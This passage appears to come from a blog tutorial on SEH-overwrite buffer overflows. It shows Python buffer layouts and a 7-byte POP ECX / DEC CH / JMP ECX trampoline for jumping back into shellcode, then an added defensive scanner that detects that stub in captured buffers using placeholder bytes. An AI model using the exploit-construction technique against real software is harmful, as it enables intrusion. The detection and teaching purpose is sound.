junk1 = 'A'*500
junk2 = 'A'*12
buffy = junk1 + nseh + seh + '\x90'*8 + junk2
So we need to jump back to somewhere before the shellcode. For example, if our shellcode is 200 bytes, the buffer will be
buffy = 'A'*300 + shellcode + nseh + seh + '\x90'*8 + junk2
We need to jump back at least 220 bytes to land in junk1, so junk2 has to perform the backward jump. To do this we can decrement the CH register (one DEC CH subtracts 256 from ECX). But first: after POP, POP, RETN the stack pointer sits three places further down the stack, so to get that memory address into ECX we do POP ECX, POP ECX, POP ECX, then JMP ECX, which lands 256 bytes back from where the original POP, POP, RETN instructions landed.
So, here is what we are doing:
POP ECX \x59
POP ECX \x59
POP ECX \x59
DEC CH \xfe\xcd
JMP ECX \xff\xe1
The shellcode/payload for junk2 is only 7 bytes long ("\x59\x59\x59\xfe\xcd\xff\xe1"), so the buffer becomes
buffy = 'A'*300 + shellcode + nseh + seh + '\x90'*13 + "\x59\x59\x59\xfe\xcd\xff\xe1"
Voila!
* if you need approx. 512 bytes, DEC CH twice
** I guess I never wrote about buffer overflows before, because there are so many great articles about buffer overflows on other sites, but this one I found quite rare.
*** or you could use egg-hunting or a jump short (\xe9)
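From the analysis side, the 7-byte stub above is a recognisable signature: a run of POP ECX (0x59), one or more DEC CH (0xFE 0xCD) and a JMP ECX (0xFF 0xE1), usually preceded by a long single-byte filler run. The Python below is an added example written for this post, not code from the original author: it decodes just the handful of opcodes mentioned here (POP ECX, DEC CH, JMP ECX, NOP and the \xeb/\xe9 jumps from the footnote), finds the trampoline in a captured buffer, and reports how far back it jumps (256 bytes per DEC CH, as explained above). The sample buffer, the INT3 bytes standing in for shellcode and the nseh/seh values are constructed placeholders, not addresses from any real target. On current Windows builds, SafeSEH, SEHOP and DEP are the mitigations that break this kind of handler overwrite; the scanner is for triaging crash inputs or captured payloads where those are absent.

```python
import re

# Constructed sample mirroring the layout in the post:
# junk1 + shellcode + nseh + seh + NOP pad + 7-byte trampoline.
SAMPLE = (
    b"A" * 300
    + b"\xcc" * 200                 # stand-in for shellcode (constructed INT3 bytes)
    + b"\xeb\x06\x90\x90"           # nseh placeholder (constructed)
    + b"\x44\x33\x22\x11"           # seh placeholder (constructed, not a real address)
    + b"\x90" * 13
    + b"\x59\x59\x59\xfe\xcd\xff\xe1"
)

# Single-byte opcodes this tiny decoder understands.
OPCODES = {
    0x59: ("pop ecx", 1),
    0x90: ("nop", 1),
}

def decode_stub(data):
    """Decode a short byte string into (offset, mnemonic) tuples.
    Only the opcodes discussed in the post are known; decoding stops
    at the first unknown byte."""
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if b in OPCODES:
            mn, ln = OPCODES[b]
        elif b == 0xFE and i + 1 < len(data) and data[i + 1] == 0xCD:
            mn, ln = "dec ch", 2
        elif b == 0xFF and i + 1 < len(data) and data[i + 1] == 0xE1:
            mn, ln = "jmp ecx", 2
        elif b == 0xEB and i + 1 < len(data):          # short jump, rel8
            rel = int.from_bytes(data[i + 1:i + 2], "little", signed=True)
            mn, ln = f"jmp short {rel:+d}", 2
        elif b == 0xE9 and i + 4 < len(data):          # near jump, rel32
            rel = int.from_bytes(data[i + 1:i + 5], "little", signed=True)
            mn, ln = f"jmp near {rel:+d}", 5
        else:
            break
        out.append((i, mn))
        i += ln
    return out

# pop ecx (1+) ; dec ch (1+) ; jmp ecx
TRAMPOLINE = re.compile(rb"(?:\x59)+(?:\xfe\xcd)+\xff\xe1")

def find_backjump_trampolines(buf):
    """Return one dict per pop/dec-ch/jmp-ecx stub found in buf: its offset,
    pop and DEC CH counts, the approximate backward displacement
    (256 bytes per DEC CH) and a disassembly of the stub."""
    hits = []
    for m in TRAMPOLINE.finditer(buf):
        stub = m.group(0)
        n_dec = stub.count(b"\xfe\xcd")
        hits.append({
            "offset": m.start(),
            "pops": stub.count(b"\x59"),
            "dec_ch": n_dec,
            "approx_back_bytes": 256 * n_dec,
            "disasm": [mn for _, mn in decode_stub(stub)],
        })
    return hits

# A run of 200 or more identical bytes: the filler seen in SEH overwrites.
FILLER_RUN = re.compile(rb"(.)\1{199,}", re.DOTALL)

def triage(buf):
    """Flag a buffer that has a long single-byte filler run followed later
    by a trampoline; returns a summary dict, or None if the pattern is absent."""
    hits = find_backjump_trampolines(buf)
    if not hits:
        return None
    run = FILLER_RUN.search(buf)
    if run is None or run.start() > hits[0]["offset"]:
        return None
    return {
        "filler_byte": run.group(1),
        "filler_len": len(run.group(0)),
        "trampolines": hits,
    }

if __name__ == "__main__":
    for hit in find_backjump_trampolines(SAMPLE):
        print(hit)
    print(triage(SAMPLE))
```

Running it on SAMPLE reports the stub at offset 521 (300 + 200 + 4 + 4 + 13), three pops, one DEC CH and a backward displacement of about 256 bytes, which tells an analyst the payload sits just before the overwritten handler rather than after it.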